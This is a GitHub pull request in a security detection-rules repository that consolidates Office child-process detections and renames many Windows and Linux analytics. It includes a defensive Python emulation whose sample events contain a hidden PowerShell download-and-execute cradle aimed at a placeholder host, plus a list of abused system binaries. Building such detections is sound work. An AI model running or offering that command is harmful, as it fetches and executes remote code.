
Multiple Rule Updates #3271

Merged
merged 49 commits into develop from major-updates
Jan 24, 2025
Conversation

@nasbench nasbench commented Jan 8, 2025

This PR introduces multiple changes and updates to the following analytics.

Deprecated Analytics

Office Analytics

The following analytics, related to misuse of Office products, were deprecated in favor of a more generic approach. This is in order to ease management of the rule. Instead of managing ~13 or so rules, we can now deal with a single source of truth with a defined macro that can be updated to add additional Office processes.

  • Winword Spawning Windows Script Host / 637e1b5c-9be1-11eb-9c32-acde48001122
  • Winword Spawning PowerShell / b2c950b8-9be2-11eb-8658-acde48001122
  • Winword Spawning Cmd / 6fcbaedc-a37b-11eb-956b-acde48001122
  • Office Product Spawning Wmic / ffc236d6-a6c9-11eb-95f1-acde48001122
  • Office Product Spawning Windows Script Host / b3628a5b-8d02-42fa-a891-eebf2351cbe1
  • Office Product Spawning MSHTA / 6078fa20-a6d2-11eb-b662-acde48001122
  • Office Product Spawning CertUtil / 6925fe72-a6d5-11eb-9e17-acde48001122
  • Office Product Spawning BITSAdmin / e8c591f4-a6d7-11eb-8cf7-acde48001122
  • Office Product Spawn CMD Process / b8b19420-e892-11eb-9244-acde48001122
  • Office Application Spawn rundll32 process / 958751e4-9c5f-11eb-b103-acde48001122
  • Office Application Spawn Regsvr32 process / 2d9fc90c-f11f-11eb-9300-acde48001122
  • Excel Spawning Windows Script Host / 57fe880a-9be3-11eb-9bf3-acde48001122
  • Excel Spawning PowerShell / 42d40a22-9be3-11eb-8f08-acde48001122

The above were replaced by Windows Office Product Spawned Uncommon Process / 55d8741c-fa32-4692-8109-410304961eb8. This rule groups all of these child processes into a single analytic.

Account Discovery With Net App / 339805ce-ac30-11eb-b87d-acde48001122

This analytic was a TTP that focused on unrelated things and was called account discovery. Since there were other detections that overlapped with it, I chose to deprecate it and replace it with an updated version of 339805ce-ac30-11eb-b87d-acde48001122 / Windows Excessive Usage Of Net App.

Attempted Credential Dump From Registry via Reg exe / e9fb4a59-c5fb-440a-9f24-191fbc6b2911

This analytic had some overlap with another one, hence the deprecation. It was replaced by 8bbb7d58-b360-11eb-ba21-acde48001122 / Windows Sensitive Registry Hive Dump Via CommandLine.

Detect Critical Alerts from Security Tools / 483e8a68-f2f7-45be-8fc9-bf725f0e22fd

As discussed internally, this analytic was too generic for an analyst to do anything with it. It was deprecated in favor of the more specific approach provided by analytics such as Microsoft Defender ATP Alerts and Microsoft Defender Incident Alerts. Going forward, analytics leveraging alerts from vendors will have their own specific analytics.

Domain Account Discovery With Net App / 98f6a534-04c2-11ec-96b2-acde48001122

This analytic was a TTP that looked only for commands that try to query info about users via net user /do. This had a couple of issues, such as triggering on the creation of users via the /add flag, etc.

It was deprecated in favor of a tighter approach in 5d0d4830-0133-11ec-bae3-acde48001122.

Domain Group Discovery With Net / f2f14ac7-fa81-471a-80d5-7eb65c3c7349

Net Localgroup Discovery / 54f5201e-155b-11ec-a6e2-acde48001122

Both of these analytics were deprecated in favor of c5c8e0f3-147a-43da-bf04-4cfaec27dc44 / Windows Group Discovery Via Net

Remote System Discovery with Net / 9df16706-04a2-41e2-bbfe-9b38b34409d3

This analytic focused on two separate and unrelated types of threats or actions. It was split into other analytics, namely:

  • Windows Network Share Interaction With Net / 4dc3951f-b3f8-4f46-b412-76a483f72277
  • Windows Sensitive Group Discovery With Net / a23a0e20-0b1b-4a07-82e5-ec5f70811e7a

Renamed Analytics

  • Attempt To Stop Security Service -> Windows Attempt To Stop Security Service
  • Change Default File Association -> Windows New Default File Association Value Set
  • Cmdline Tool Not Executed In CMD Shell -> Windows Cmdline Tool Execution From Non-Shell Process
  • Create local admin accounts using net exe -> Windows Create Local Administrator Account Via Net
  • Detect processes used for System Network Configuration Discovery -> Potential System Network Configuration Discovery Activity
  • Elevated Group Discovery With Net -> Windows Sensitive Group Discovery With Net
  • Excessive Service Stop Attempt -> Windows Excessive Service Stop Attempt
  • Excessive Usage Of Net App -> Windows Excessive Usage Of Net App
  • Extraction of Registry Hives -> Windows Sensitive Registry Hive Dump Via CommandLine
  • Linux Auditd Find Private Keys -> Linux Auditd Private Keys and Certificate Enumeration
  • MSHTML Module Load in Office Product -> Windows Office Product Loaded MSHTML Module
  • Network Connection Discovery With Net -> Windows Network Connection Discovery Via Net
  • Office Document Creating Schedule Task -> Windows Office Product Loading Taskschd DLL
  • Office Document Executing Macro Code -> Windows Office Product Loading VBE7 DLL
  • Office Document Spawned Child Process To Download -> Windows Office Product Spawned Child Process For Download
  • Password Policy Discovery with Net -> Windows Password Policy Discovery with Net
  • Windows Command Shell Fetch Env Variables -> Windows List ENV Variables Via SET Command From Uncommon Parent
  • Windows Modify Registry Reg Restore -> Windows Registry Entries Restored Via Reg
  • Windows MSIExec With Network Connections -> Windows HTTP Network Communication From MSIExec
  • Windows Network Share Interaction With Net -> Windows Network Share Interaction Via Net
  • Office Product Writing cab or inf -> Windows Office Product Dropped Cab or Inf File
  • Office Application Drop Executable -> Windows Office Product Dropped Uncommon File
  • Office Spawning Control -> Windows Office Product Spawned Control
  • Windows Office Product Spawning MSDT -> Windows Office Product Spawned MSDT
  • Office Product Spawning Rundll32 with no DLL -> Windows Office Product Spawned Rundll32 With No DLL
  • Windows Query Registry Reg Save -> Windows Registry Entries Exported Via Reg
  • Windows Service Stop Via Net and SC Application -> Windows Service Stop Attempt
  • Windows Valid Account With Never Expires Password -> Windows Set Account Password Policy To Unlimited Via Net
  • Detect Webshell Exploit Behavior -> Windows Suspicious Child Process Spawned From WebServer
  • Deleting Of Net Users -> Windows User Deletion Via Net
  • Disabling Net User Account -> Windows User Disabled Via Net
  • Local Account Discovery with Net -> Windows User Discovery Via Net

Updated Analytics

Auditd Analytics

All Auditd analytics leveraging the data source Linux Auditd Execve have been updated to include a rename that will help with the integration with ES, namely: rename comm as process_name | rename exe as process

Other

  • detections/endpoint/linux_auditd_private_keys_and_certificate_enumeration.yml
  • detections/endpoint/potential_system_network_configuration_discovery_activity.yml
  • detections/endpoint/powershell_loading_dotnet_into_memory_via_reflection.yml
  • detections/endpoint/windows_attempt_to_stop_security_service.yml
  • detections/endpoint/windows_cmdline_tool_execution_from_non_shell_process.yml
  • detections/endpoint/windows_create_local_administrator_account_via_net.yml
  • detections/endpoint/windows_excessive_service_stop_attempt.yml
  • detections/endpoint/windows_excessive_usage_of_net_app.yml
  • detections/endpoint/windows_group_discovery_via_net.yml
  • detections/endpoint/windows_http_network_communication_from_msiexec.yml
  • detections/endpoint/windows_list_env_variables_via_set_command_from_uncommon_parent.yml
  • detections/endpoint/windows_network_connection_discovery_via_net.yml
  • detections/endpoint/windows_network_share_interaction_via_net.yml
  • detections/endpoint/windows_new_default_file_association_value_set.yml
  • detections/endpoint/windows_office_product_dropped_cab_or_inf_file.yml
  • detections/endpoint/windows_office_product_dropped_uncommon_file.yml
  • detections/endpoint/windows_office_product_loaded_mshtml_module.yml
  • detections/endpoint/windows_office_product_loading_taskschd_dll.yml
  • detections/endpoint/windows_office_product_loading_vbe7_dll.yml
  • detections/endpoint/windows_office_product_spawned_child_process_for_download.yml
  • detections/endpoint/windows_office_product_spawned_control.yml
  • detections/endpoint/windows_office_product_spawned_msdt.yml
  • detections/endpoint/windows_office_product_spawned_rundll32_with_no_dll.yml
  • detections/endpoint/windows_office_product_spawned_uncommon_process.yml
  • detections/endpoint/windows_password_policy_discovery_with_net.yml
  • detections/endpoint/windows_registry_entries_exported_via_reg.yml
  • detections/endpoint/windows_registry_entries_restored_via_reg.yml
  • detections/endpoint/windows_sensitive_group_discovery_with_net.yml
  • detections/endpoint/windows_sensitive_registry_hive_dump_via_commandline.yml
  • detections/endpoint/windows_service_stop_attempt.yml
  • detections/endpoint/windows_set_account_password_policy_to_unlimited_via_net.yml
  • detections/endpoint/windows_suspicious_child_process_spawned_from_webserver.yml
  • detections/endpoint/windows_user_deletion_via_net.yml
  • detections/endpoint/windows_user_disabled_via_net.yml
  • detections/endpoint/windows_user_discovery_via_net.yml
  • detections/web/windows_exchange_autodiscover_ssrf_abuse.yml
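The grouping approach behind Windows Office Product Spawned Uncommon Process, as an added example that is not part of this PR or the project's own SPL: a Python emulation of a single Office-parent list (the role the macro plays) and a single uncommon-child list, checked in one detection and run over constructed process-creation events. The parent and child lists are assumptions derived from the deprecated rule names above (winword and excel are from the PR; powerpnt.exe is an assumed addition included only to show the macro being extended), and the events are made up, not real telemetry.

```python
"""Emulation of the consolidated "Office product spawned uncommon process" logic.

Added example, not the project's SPL or macro. It mirrors the PR's approach:
one list of Office parent images (the "macro") and one list of uncommon child
images, checked in a single detection instead of ~13 per-child rules.
The parent and child lists are assumptions derived from the deprecated rule
names in the PR, and the events are constructed, not real telemetry.
"""
from collections import Counter
from dataclasses import dataclass
from typing import Iterable

# Assumed macro contents: Office parent images to watch. Adding a new Office
# process here is the single change the PR describes, instead of touching
# every per-child rule. winword/excel come from the PR; powerpnt is assumed.
OFFICE_PARENTS = frozenset({"winword.exe", "excel.exe", "powerpnt.exe"})

# Children covered by the deprecated rules listed in the PR (Windows Script
# Host, PowerShell, cmd, wmic, mshta, certutil, bitsadmin, rundll32, regsvr32).
UNCOMMON_CHILDREN = frozenset({
    "wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "wmic.exe",
    "mshta.exe", "certutil.exe", "bitsadmin.exe", "rundll32.exe", "regsvr32.exe",
})


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (Endpoint.Processes-style field names)."""
    dest: str
    user: str
    parent_process_name: str
    process_name: str
    process: str  # full command line


def image_name(path_or_name: str) -> str:
    """Normalise a full image path or bare name to a lowercase basename."""
    return path_or_name.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def office_spawned_uncommon_process(events: Iterable[ProcessEvent]) -> list[ProcessEvent]:
    """Single detection replacing the per-child rules: Office parent AND uncommon child."""
    return [
        e for e in events
        if image_name(e.parent_process_name) in OFFICE_PARENTS
        and image_name(e.process_name) in UNCOMMON_CHILDREN
    ]


def summarize(hits: Iterable[ProcessEvent]) -> dict[tuple[str, str, str], int]:
    """Aggregate like a `stats count by dest parent_process_name process_name`."""
    return dict(Counter(
        (h.dest, image_name(h.parent_process_name), image_name(h.process_name))
        for h in hits
    ))


# Constructed sample events (not real logs).
SAMPLE_EVENTS = [
    # Word -> PowerShell: would have matched the old "Winword Spawning PowerShell".
    ProcessEvent("ws01", "CORP\\alice",
                 "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
                 "powershell.exe",
                 "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                 ".DownloadString('http://example.test/a')\""),
    # Excel -> wscript: old "Excel Spawning Windows Script Host".
    ProcessEvent("ws02", "CORP\\bob", "EXCEL.EXE", "wscript.exe",
                 "wscript.exe C:\\Users\\bob\\AppData\\Local\\Temp\\inv.js"),
    # Word -> splwow64 (printing): Office parent, but not an uncommon child.
    ProcessEvent("ws01", "CORP\\alice", "WINWORD.EXE", "splwow64.exe",
                 "C:\\Windows\\splwow64.exe 12288"),
    # explorer -> cmd: uncommon child, but the parent is not an Office product.
    ProcessEvent("ws03", "CORP\\carol", "explorer.exe", "cmd.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    hits = office_spawned_uncommon_process(SAMPLE_EVENTS)
    for hit in hits:
        print(f"{hit.dest} {hit.user}: {image_name(hit.parent_process_name)} -> {hit.process}")
    print(summarize(hits))
```

Only the two Office-parent/uncommon-child pairs match; the printing helper spawned by Word and the cmd spawned by explorer are dropped by the parent or child check respectively. Extending coverage to another Office binary is a one-line change to OFFICE_PARENTS, which is the maintenance benefit the PR describes.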

@nasbench nasbench added the WIP DO NOT MERGE Work in Progress label Jan 8, 2025
@josehelps josehelps added the 5.0 label Jan 16, 2025
@josehelps josehelps added this to the v5.0.0 milestone Jan 16, 2025
- Updated detection description to better explain ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) and ProxyNotShell (CVE-2022-41040, CVE-2022-41082) attack patterns
- Enhanced search query:
  - X-Rps-CAT parameter
  - Suspicious user agent strings
@patel-bhavin

@nasbench, for consistency: I think that for the detections that are now status: deprecated, we should move those files to the deprecated folder in the detections/ directory! That may also help with the build-related errors on this CI.

@nasbench nasbench marked this pull request as ready for review January 23, 2025 14:35
@patel-bhavin

The detection passed on the second attempt in the CI.

@patel-bhavin patel-bhavin merged commit eaa2880 into develop Jan 24, 2025
3 of 4 checks passed
@patel-bhavin patel-bhavin deleted the major-updates branch January 24, 2025 18:15
@patel-bhavin patel-bhavin removed WIP DO NOT MERGE Work in Progress Playbooks labels Jan 24, 2025